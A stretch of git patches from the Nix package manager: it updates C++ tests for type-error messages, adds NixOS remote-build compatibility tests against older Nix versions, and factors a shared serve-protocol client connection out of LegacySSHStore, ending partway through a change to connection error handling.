XXX: Trace too deep, need better asserts @@ -857,17 +857,17 @@ namespace nix { TEST_F(ErrorTraceTest, partition) { ASSERT_TRACE2("partition 1 \"foo\"", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.partition")); ASSERT_TRACE2("partition (_: 1) \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.partition")); ASSERT_TRACE2("partition (_: 1) [ \"foo\" ]", TypeError, - hintfmt("value is %s while a Boolean was expected", "an integer"), + 
hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the return value of the partition function passed to builtins.partition")); } @@ -876,17 +876,17 @@ namespace nix { TEST_F(ErrorTraceTest, groupBy) { ASSERT_TRACE2("groupBy 1 \"foo\"", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.groupBy")); ASSERT_TRACE2("groupBy (_: 1) \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.groupBy")); ASSERT_TRACE2("groupBy (x: x) [ \"foo\" \"bar\" 1 ]", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the return value of the grouping function passed to builtins.groupBy")); } @@ -895,22 +895,22 @@ namespace nix { TEST_F(ErrorTraceTest, concatMap) { ASSERT_TRACE2("concatMap 1 \"foo\"", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: 1) \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: 1) [ \"foo\" ] # TODO", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an 
integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the return value of the function passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: \"foo\") [ 1 2 ] # TODO", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the return value of the function passed to builtins.concatMap")); } @@ -919,12 +919,12 @@ namespace nix { TEST_F(ErrorTraceTest, add) { ASSERT_TRACE2("add \"foo\" 1", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the first argument of the addition")); ASSERT_TRACE2("add 1 \"foo\"", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument of the addition")); } @@ -933,12 +933,12 @@ namespace nix { TEST_F(ErrorTraceTest, sub) { ASSERT_TRACE2("sub \"foo\" 1", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the first argument of the subtraction")); ASSERT_TRACE2("sub 1 \"foo\"", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument of the subtraction")); } @@ -947,12 +947,12 @@ namespace nix { TEST_F(ErrorTraceTest, mul) { ASSERT_TRACE2("mul \"foo\" 1", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the 
first argument of the multiplication")); ASSERT_TRACE2("mul 1 \"foo\"", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument of the multiplication")); } @@ -961,12 +961,12 @@ namespace nix { TEST_F(ErrorTraceTest, div) { ASSERT_TRACE2("div \"foo\" 1 # TODO: an integer was expected -> a number", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the first operand of the division")); ASSERT_TRACE2("div 1 \"foo\"", TypeError, - hintfmt("value is %s while a float was expected", "a string"), + hintfmt("expected a float but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second operand of the division")); ASSERT_TRACE1("div \"foo\" 0", @@ -979,12 +979,12 @@ namespace nix { TEST_F(ErrorTraceTest, bitAnd) { ASSERT_TRACE2("bitAnd 1.1 2", TypeError, - hintfmt("value is %s while an integer was expected", "a float"), + hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "1.1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.bitAnd")); ASSERT_TRACE2("bitAnd 1 2.2", TypeError, - hintfmt("value is %s while an integer was expected", "a float"), + hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "2.2" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.bitAnd")); } @@ -993,12 +993,12 @@ namespace nix { TEST_F(ErrorTraceTest, bitOr) { ASSERT_TRACE2("bitOr 1.1 2", TypeError, - hintfmt("value is %s while an integer was expected", "a float"), + hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "1.1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.bitOr")); ASSERT_TRACE2("bitOr 1 
2.2", TypeError, - hintfmt("value is %s while an integer was expected", "a float"), + hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "2.2" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.bitOr")); } @@ -1007,12 +1007,12 @@ namespace nix { TEST_F(ErrorTraceTest, bitXor) { ASSERT_TRACE2("bitXor 1.1 2", TypeError, - hintfmt("value is %s while an integer was expected", "a float"), + hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "1.1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.bitXor")); ASSERT_TRACE2("bitXor 1 2.2", TypeError, - hintfmt("value is %s while an integer was expected", "a float"), + hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "2.2" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.bitXor")); } @@ -1047,12 +1047,12 @@ namespace nix { TEST_F(ErrorTraceTest, substring) { ASSERT_TRACE2("substring {} \"foo\" true", TypeError, - hintfmt("value is %s while an integer was expected", "a set"), + hintfmt("expected an integer but found %s: %s", "a set", "{ }"), hintfmt("while evaluating the first argument (the start offset) passed to builtins.substring")); ASSERT_TRACE2("substring 3 \"foo\" true", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument (the substring length) passed to builtins.substring")); ASSERT_TRACE2("substring 0 3 {}", @@ -1079,7 +1079,7 @@ namespace nix { TEST_F(ErrorTraceTest, hashString) { ASSERT_TRACE2("hashString 1 {}", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.hashString")); ASSERT_TRACE1("hashString \"foo\" \"content\"", @@ 
-1088,7 +1088,7 @@ namespace nix { ASSERT_TRACE2("hashString \"sha256\" {}", TypeError, - hintfmt("value is %s while a string was expected", "a set"), + hintfmt("expected a string but found %s: %s", "a set", "{ }"), hintfmt("while evaluating the second argument passed to builtins.hashString")); } @@ -1097,12 +1097,12 @@ namespace nix { TEST_F(ErrorTraceTest, match) { ASSERT_TRACE2("match 1 {}", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.match")); ASSERT_TRACE2("match \"foo\" {}", TypeError, - hintfmt("value is %s while a string was expected", "a set"), + hintfmt("expected a string but found %s: %s", "a set", "{ }"), hintfmt("while evaluating the second argument passed to builtins.match")); ASSERT_TRACE1("match \"(.*\" \"\"", @@ -1115,12 +1115,12 @@ namespace nix { TEST_F(ErrorTraceTest, split) { ASSERT_TRACE2("split 1 {}", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.split")); ASSERT_TRACE2("split \"foo\" {}", TypeError, - hintfmt("value is %s while a string was expected", "a set"), + hintfmt("expected a string but found %s: %s", "a set", "{ }"), hintfmt("while evaluating the second argument passed to builtins.split")); ASSERT_TRACE1("split \"f(o*o\" \"1foo2\"", @@ -1133,12 +1133,12 @@ namespace nix { TEST_F(ErrorTraceTest, concatStringsSep) { ASSERT_TRACE2("concatStringsSep 1 {}", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument (the separator string) passed to builtins.concatStringsSep")); ASSERT_TRACE2("concatStringsSep \"foo\" 
{}", TypeError, - hintfmt("value is %s while a list was expected", "a set"), + hintfmt("expected a list but found %s: %s", "a set", "{ }"), hintfmt("while evaluating the second argument (the list of strings to concat) passed to builtins.concatStringsSep")); ASSERT_TRACE2("concatStringsSep \"foo\" [ 1 2 {} ] # TODO: coerce to string is buggy", @@ -1152,7 +1152,7 @@ namespace nix { TEST_F(ErrorTraceTest, parseDrvName) { ASSERT_TRACE2("parseDrvName 1", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.parseDrvName")); } @@ -1161,12 +1161,12 @@ namespace nix { TEST_F(ErrorTraceTest, compareVersions) { ASSERT_TRACE2("compareVersions 1 {}", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.compareVersions")); ASSERT_TRACE2("compareVersions \"abd\" {}", TypeError, - hintfmt("value is %s while a string was expected", "a set"), + hintfmt("expected a string but found %s: %s", "a set", "{ }"), hintfmt("while evaluating the second argument passed to builtins.compareVersions")); } @@ -1175,7 +1175,7 @@ namespace nix { TEST_F(ErrorTraceTest, splitVersion) { ASSERT_TRACE2("splitVersion 1", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.splitVersion")); } @@ -1189,7 +1189,7 @@ namespace nix { TEST_F(ErrorTraceTest, derivationStrict) { ASSERT_TRACE2("derivationStrict \"\"", TypeError, - hintfmt("value is %s while a set was expected", "a string"), + hintfmt("expected a set but found %s: %s", "a string", "\"\""), hintfmt("while evaluating the 
argument passed to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict {}", @@ -1199,7 +1199,7 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = 1; }", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", "1"), hintfmt("while evaluating the `name` attribute passed to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; }", @@ -1209,12 +1209,12 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; __structuredAttrs = 15; }", TypeError, - hintfmt("value is %s while a Boolean was expected", "an integer"), + hintfmt("expected a Boolean but found %s: %s", "an integer", "15"), hintfmt("while evaluating the `__structuredAttrs` attribute passed to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; __ignoreNulls = 15; }", TypeError, - hintfmt("value is %s while a Boolean was expected", "an integer"), + hintfmt("expected a Boolean but found %s: %s", "an integer", "15"), hintfmt("while evaluating the `__ignoreNulls` attribute passed to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; outputHashMode = 15; }", @@ -1259,22 +1259,22 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; __contentAddressed = \"true\"; }", TypeError, - hintfmt("value is %s while a Boolean was expected", "a string"), + hintfmt("expected a Boolean but found %s: %s", "a string", "\"true\""), hintfmt("while evaluating the attribute '__contentAddressed' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; __impure = \"true\"; }", TypeError, - hintfmt("value is %s while a Boolean was expected", "a string"), + hintfmt("expected a Boolean but found %s: %s", "a string", "\"true\""), hintfmt("while evaluating the attribute '__impure' of 
derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; __impure = \"true\"; }", TypeError, - hintfmt("value is %s while a Boolean was expected", "a string"), + hintfmt("expected a Boolean but found %s: %s", "a string", "\"true\""), hintfmt("while evaluating the attribute '__impure' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = \"foo\"; }", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", "\"foo\""), hintfmt("while evaluating the attribute 'args' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ {} ]; }", From e502d1cf945fb3cdd0ca1e1c16ec330ccab51c7b Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 22 Jan 2024 18:34:52 +0100 Subject: [PATCH 325/654] tests/nixos: Test remote build against older versions --- tests/nixos/default.nix | 100 +++++++++++++++++++++++++++ tests/nixos/remote-builds-ssh-ng.nix | 21 +++++- tests/nixos/remote-builds.nix | 21 +++++- 3 files changed, 136 insertions(+), 6 deletions(-) diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix index 1a42f886c..8f4fa2621 100644 --- a/tests/nixos/default.nix +++ b/tests/nixos/default.nix @@ -28,6 +28,13 @@ let }; }; + # Checks that a NixOS configuration does not contain any references to our + # locally defined Nix version. + checkOverrideNixVersion = { pkgs, lib, ... }: { + # pkgs.nix: The new Nix in this repo + # We disallow it, to make sure we don't accidentally use it. 
+ system.forbiddenDependenciesRegex = lib.strings.escapeRegex "nix-${pkgs.nix.version}"; + }; in { @@ -35,8 +42,101 @@ in remoteBuilds = runNixOSTestFor "x86_64-linux" ./remote-builds.nix; + # Test our Nix as a client against remotes that are older + + remoteBuilds_remote_2_3 = runNixOSTestFor "x86_64-linux" { + name = "remoteBuilds_remote_2_3"; + imports = [ ./remote-builds.nix ]; + builders.config = { lib, pkgs, ... }: { + imports = [ checkOverrideNixVersion ]; + nix.package = lib.mkForce pkgs.nixVersions.nix_2_3; + }; + }; + + remoteBuilds_remote_2_13 = runNixOSTestFor "x86_64-linux" ({ lib, pkgs, ... }: { + name = "remoteBuilds_remote_2_13"; + imports = [ ./remote-builds.nix ]; + builders.config = { lib, pkgs, ... }: { + imports = [ checkOverrideNixVersion ]; + nix.package = lib.mkForce pkgs.nixVersions.nix_2_3; + }; + }); + + # TODO: (nixpkgs update) remoteBuilds_remote_2_18 = ... + + # Test our Nix as a builder for clients that are older + + remoteBuilds_local_2_3 = runNixOSTestFor "x86_64-linux" ({ lib, pkgs, ... }: { + name = "remoteBuilds_local_2_3"; + imports = [ ./remote-builds.nix ]; + nodes.client = { lib, pkgs, ... }: { + imports = [ checkOverrideNixVersion ]; + nix.package = lib.mkForce pkgs.nixVersions.nix_2_3; + }; + }); + + remoteBuilds_local_2_13 = runNixOSTestFor "x86_64-linux" ({ lib, pkgs, ... }: { + name = "remoteBuilds_local_2_13"; + imports = [ ./remote-builds.nix ]; + nodes.client = { lib, pkgs, ... }: { + imports = [ checkOverrideNixVersion ]; + nix.package = lib.mkForce pkgs.nixVersions.nix_2_13; + }; + }); + + # TODO: (nixpkgs update) remoteBuilds_local_2_18 = ... + + # End remoteBuilds tests + remoteBuildsSshNg = runNixOSTestFor "x86_64-linux" ./remote-builds-ssh-ng.nix; + # Test our Nix as a client against remotes that are older + + remoteBuildsSshNg_remote_2_3 = runNixOSTestFor "x86_64-linux" { + name = "remoteBuildsSshNg_remote_2_3"; + imports = [ ./remote-builds-ssh-ng.nix ]; + builders.config = { lib, pkgs, ... 
}: { + imports = [ checkOverrideNixVersion ]; + nix.package = lib.mkForce pkgs.nixVersions.nix_2_3; + }; + }; + + remoteBuildsSshNg_remote_2_13 = runNixOSTestFor "x86_64-linux" { + name = "remoteBuildsSshNg_remote_2_13"; + imports = [ ./remote-builds-ssh-ng.nix ]; + builders.config = { lib, pkgs, ... }: { + imports = [ checkOverrideNixVersion ]; + nix.package = lib.mkForce pkgs.nixVersions.nix_2_13; + }; + }; + + # TODO: (nixpkgs update) remoteBuildsSshNg_remote_2_18 = ... + + # Test our Nix as a builder for clients that are older + + # FIXME: these tests don't work yet + /* + remoteBuildsSshNg_local_2_3 = runNixOSTestFor "x86_64-linux" ({ lib, pkgs, ... }: { + name = "remoteBuildsSshNg_local_2_3"; + imports = [ ./remote-builds-ssh-ng.nix ]; + nodes.client = { lib, pkgs, ... }: { + imports = [ checkOverrideNixVersion ]; + nix.package = lib.mkForce pkgs.nixVersions.nix_2_3; + }; + }); + + remoteBuildsSshNg_local_2_13 = runNixOSTestFor "x86_64-linux" ({ lib, pkgs, ... }: { + name = "remoteBuildsSshNg_local_2_13"; + imports = [ ./remote-builds-ssh-ng.nix ]; + nodes.client = { lib, pkgs, ... }: { + imports = [ checkOverrideNixVersion ]; + nix.package = lib.mkForce pkgs.nixVersions.nix_2_13; + }; + }); + + # TODO: (nixpkgs update) remoteBuildsSshNg_local_2_18 = ... + */ + nix-copy-closure = runNixOSTestFor "x86_64-linux" ./nix-copy-closure.nix; nix-copy = runNixOSTestFor "x86_64-linux" ./nix-copy.nix; diff --git a/tests/nixos/remote-builds-ssh-ng.nix b/tests/nixos/remote-builds-ssh-ng.nix index 20a43803d..b9174a788 100644 --- a/tests/nixos/remote-builds-ssh-ng.nix +++ b/tests/nixos/remote-builds-ssh-ng.nix @@ -1,4 +1,4 @@ -{ config, lib, hostPkgs, ... }: +test@{ config, lib, hostPkgs, ... 
}: let pkgs = config.nodes.client.nixpkgs.pkgs; @@ -28,12 +28,27 @@ let in { - name = "remote-builds-ssh-ng"; + name = lib.mkDefault "remote-builds-ssh-ng"; + + # TODO expand module shorthand syntax instead of use imports + imports = [{ + options = { + builders.config = lib.mkOption { + type = lib.types.deferredModule; + description = '' + Configuration to add to the builder nodes. + ''; + default = { }; + }; + }; + }]; nodes = { builder = { config, pkgs, ... }: - { services.openssh.enable = true; + { + imports = [ test.config.builders.config ]; + services.openssh.enable = true; virtualisation.writableStore = true; nix.settings.sandbox = true; nix.settings.substituters = lib.mkForce [ ]; diff --git a/tests/nixos/remote-builds.nix b/tests/nixos/remote-builds.nix index ad7f509db..6f9b0ebf0 100644 --- a/tests/nixos/remote-builds.nix +++ b/tests/nixos/remote-builds.nix @@ -1,6 +1,6 @@ # Test Nix's remote build feature. -{ config, lib, hostPkgs, ... }: +test@{ config, lib, hostPkgs, ... }: let pkgs = config.nodes.client.nixpkgs.pkgs; @@ -8,7 +8,9 @@ let # The configuration of the remote builders. builder = { config, pkgs, ... }: - { services.openssh.enable = true; + { + imports = [ test.config.builders.config ]; + services.openssh.enable = true; virtualisation.writableStore = true; nix.settings.sandbox = true; @@ -35,7 +37,20 @@ let in { - name = "remote-builds"; + name = lib.mkDefault "remote-builds"; + + # TODO expand module shorthand syntax instead of use imports + imports = [{ + options = { + builders.config = lib.mkOption { + type = lib.types.deferredModule; + description = '' + Configuration to add to the builder nodes. 
+ ''; + default = { }; + }; + }; + }]; nodes = { builder1 = builder; From ce2f714e6daa0250f30bc3a14967e4e3a7777d9f Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 20 Feb 2022 19:24:07 +0000 Subject: [PATCH 326/654] Start factoring out the serve protocol for Hydra to share Factor out `ServeProto::BasicClientConnection` for Hydra to share - `queryValidPaths`: Hydra uses the lock argument differently than Nix, so we un-hard-code it. - `buildDerivationRequest`: Just the request half, as Hydra does some things between requesting and responding. Co-authored-by: Robert Hensing --- src/libstore/legacy-ssh-store.cc | 65 ++++------------------------- src/libstore/legacy-ssh-store.hh | 4 -- src/libstore/serve-protocol-impl.cc | 38 +++++++++++++++++ src/libstore/serve-protocol-impl.hh | 54 ++++++++++++++++++++++++ src/libstore/serve-protocol.hh | 7 ++++ 5 files changed, 107 insertions(+), 61 deletions(-) create mode 100644 src/libstore/serve-protocol-impl.cc diff --git a/src/libstore/legacy-ssh-store.cc b/src/libstore/legacy-ssh-store.cc index 06bef9d08..b89dd5fd9 100644 --- a/src/libstore/legacy-ssh-store.cc +++ b/src/libstore/legacy-ssh-store.cc @@ -22,45 +22,10 @@ std::string LegacySSHStoreConfig::doc() } -struct LegacySSHStore::Connection +struct LegacySSHStore::Connection : public ServeProto::BasicClientConnection { std::unique_ptr sshConn; - FdSink to; - FdSource from; - ServeProto::Version remoteVersion; bool good = true; - - /** - * Coercion to `ServeProto::ReadConn`. This makes it easy to use the - * factored out serve protocol searlizers with a - * `LegacySSHStore::Connection`. - * - * The serve protocol connection types are unidirectional, unlike - * this type. - */ - operator ServeProto::ReadConn () - { - return ServeProto::ReadConn { - .from = from, - .version = remoteVersion, - }; - } - - /* - * Coercion to `ServeProto::WriteConn`. This makes it easy to use the - * factored out serve protocol searlizers with a - * `LegacySSHStore::Connection`. 
- * - * The serve protocol connection types are unidirectional, unlike - * this type. - */ - operator ServeProto::WriteConn () - { - return ServeProto::WriteConn { - .to = to, - .version = remoteVersion, - }; - } }; @@ -232,16 +197,16 @@ void LegacySSHStore::narFromPath(const StorePath & path, Sink & sink) } -void LegacySSHStore::putBuildSettings(Connection & conn) +static ServeProto::BuildOptions buildSettings() { - ServeProto::write(*this, conn, ServeProto::BuildOptions { + return { .maxSilentTime = settings.maxSilentTime, .buildTimeout = settings.buildTimeout, .maxLogSize = settings.maxLogSize, .nrRepeats = 0, // buildRepeat hasn't worked for ages anyway .enforceDeterminism = 0, .keepFailed = settings.keepFailed, - }); + }; } @@ -250,14 +215,7 @@ BuildResult LegacySSHStore::buildDerivation(const StorePath & drvPath, const Bas { auto conn(connections->get()); - conn->to - << ServeProto::Command::BuildDerivation - << printStorePath(drvPath); - writeDerivation(conn->to, *this, drv); - - putBuildSettings(*conn); - - conn->to.flush(); + conn->putBuildDerivationRequest(*this, drvPath, drv, buildSettings()); return ServeProto::Serialise::read(*this, *conn); } @@ -288,7 +246,7 @@ void LegacySSHStore::buildPaths(const std::vector & drvPaths, Build } conn->to << ss; - putBuildSettings(*conn); + ServeProto::write(*this, *conn, buildSettings()); conn->to.flush(); @@ -328,15 +286,8 @@ StorePathSet LegacySSHStore::queryValidPaths(const StorePathSet & paths, SubstituteFlag maybeSubstitute) { auto conn(connections->get()); - - conn->to - << ServeProto::Command::QueryValidPaths - << false // lock - << maybeSubstitute; - ServeProto::write(*this, *conn, paths); - conn->to.flush(); - - return ServeProto::Serialise::read(*this, *conn); + return conn->queryValidPaths(*this, + false, paths, maybeSubstitute); } diff --git a/src/libstore/legacy-ssh-store.hh b/src/libstore/legacy-ssh-store.hh index 7cee31d66..bdf79eab3 100644 --- a/src/libstore/legacy-ssh-store.hh +++ 
b/src/libstore/legacy-ssh-store.hh @@ -78,10 +78,6 @@ struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Stor RepairFlag repair = NoRepair) override { unsupported("addToStore"); } -private: - - void putBuildSettings(Connection & conn); - public: BuildResult buildDerivation(const StorePath & drvPath, const BasicDerivation & drv, diff --git a/src/libstore/serve-protocol-impl.cc b/src/libstore/serve-protocol-impl.cc new file mode 100644 index 000000000..e65de7650 --- /dev/null +++ b/src/libstore/serve-protocol-impl.cc @@ -0,0 +1,38 @@ +#include "serve-protocol-impl.hh" +#include "build-result.hh" +#include "derivations.hh" + +namespace nix { + +StorePathSet ServeProto::BasicClientConnection::queryValidPaths( + const Store & store, + bool lock, const StorePathSet & paths, + SubstituteFlag maybeSubstitute) +{ + to + << ServeProto::Command::QueryValidPaths + << lock + << maybeSubstitute; + write(store, *this, paths); + to.flush(); + + return Serialise::read(store, *this); +} + + +void ServeProto::BasicClientConnection::putBuildDerivationRequest( + const Store & store, + const StorePath & drvPath, const BasicDerivation & drv, + const ServeProto::BuildOptions & options) +{ + to + << ServeProto::Command::BuildDerivation + << store.printStorePath(drvPath); + writeDerivation(to, store, drv); + + ServeProto::write(store, *this, options); + + to.flush(); +} + +} diff --git a/src/libstore/serve-protocol-impl.hh b/src/libstore/serve-protocol-impl.hh index 6f3b177ac..312f5d47a 100644 --- a/src/libstore/serve-protocol-impl.hh +++ b/src/libstore/serve-protocol-impl.hh @@ -10,6 +10,7 @@ #include "serve-protocol.hh" #include "length-prefixed-protocol-helper.hh" +#include "store-api.hh" namespace nix { @@ -56,4 +57,57 @@ struct ServeProto::Serialise /* protocol-specific templates */ +struct ServeProto::BasicClientConnection +{ + FdSink to; + FdSource from; + ServeProto::Version remoteVersion; + + /** + * Coercion to `ServeProto::ReadConn`. 
This makes it easy to use the + * factored out serve protocol serializers with a + * `LegacySSHStore::Connection`. + * + * The serve protocol connection types are unidirectional, unlike + * this type. + */ + operator ServeProto::ReadConn () + { + return ServeProto::ReadConn { + .from = from, + .version = remoteVersion, + }; + } + + /** + * Coercion to `ServeProto::WriteConn`. This makes it easy to use the + * factored out serve protocol serializers with a + * `LegacySSHStore::Connection`. + * + * The serve protocol connection types are unidirectional, unlike + * this type. + */ + operator ServeProto::WriteConn () + { + return ServeProto::WriteConn { + .to = to, + .version = remoteVersion, + }; + } + + StorePathSet queryValidPaths( + const Store & remoteStore, + bool lock, const StorePathSet & paths, + SubstituteFlag maybeSubstitute); + + /** + * Just the request half, because Hydra may do other things between + * issuing the request and reading the `BuildResult` response. + */ + void putBuildDerivationRequest( + const Store & store, + const StorePath & drvPath, const BasicDerivation & drv, + const ServeProto::BuildOptions & options); +}; + } diff --git a/src/libstore/serve-protocol.hh b/src/libstore/serve-protocol.hh index 1665b935f..632c4b6bd 100644 --- a/src/libstore/serve-protocol.hh +++ b/src/libstore/serve-protocol.hh @@ -59,6 +59,13 @@ struct ServeProto Version version; }; + /** + * Stripped down serialization logic suitable for sharing with Hydra. + * + * @todo remove once Hydra uses Store abstraction consistently. + */ + struct BasicClientConnection; + /** * Data type for canonical pairs of serialisers for the serve protocol. * From 4580bed3e47eba844ec905d7a0e5fec79fb06b67 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 19 Jan 2024 10:24:07 -0500 Subject: [PATCH 327/654] `LegacySSHStore::openConnection` move more logic inside catch block Broader error handling logic is more robust. 
--- src/libstore/legacy-ssh-store.cc | 29 ++++++++++++++--------------- 1 file changed, 14 insertions(+), 15 deletions(-) diff --git a/src/libstore/legacy-ssh-store.cc b/src/libstore/legacy-ssh-store.cc index b89dd5fd9..058b1affd 100644 --- a/src/libstore/legacy-ssh-store.cc +++ b/src/libstore/legacy-ssh-store.cc @@ -61,28 +61,27 @@ ref LegacySSHStore::openConnection() conn->to = FdSink(conn->sshConn->in.get()); conn->from = FdSource(conn->sshConn->out.get()); + StringSink saved; + TeeSource tee(conn->from, saved); try { conn->to << SERVE_MAGIC_1 << SERVE_PROTOCOL_VERSION; conn->to.flush(); - StringSink saved; - try { - TeeSource tee(conn->from, saved); - unsigned int magic = readInt(tee); - if (magic != SERVE_MAGIC_2) - throw Error("'nix-store --serve' protocol mismatch from '%s'", host); - } catch (SerialisationError & e) { - /* In case the other side is waiting for our input, - close it. */ - conn->sshConn->in.close(); - auto msg = conn->from.drain(); - throw Error("'nix-store --serve' protocol mismatch from '%s', got '%s'", - host, chomp(saved.s + msg)); - } + unsigned int magic = readInt(conn->from); + if (magic != SERVE_MAGIC_2) + throw Error("'nix-store --serve' protocol mismatch from '%s'", host); conn->remoteVersion = readInt(conn->from); if (GET_PROTOCOL_MAJOR(conn->remoteVersion) != 0x200) throw Error("unsupported 'nix-store --serve' protocol version on '%s'", host); - + } catch (SerialisationError & e) { + // in.close(): Don't let the remote block on us not writing. 
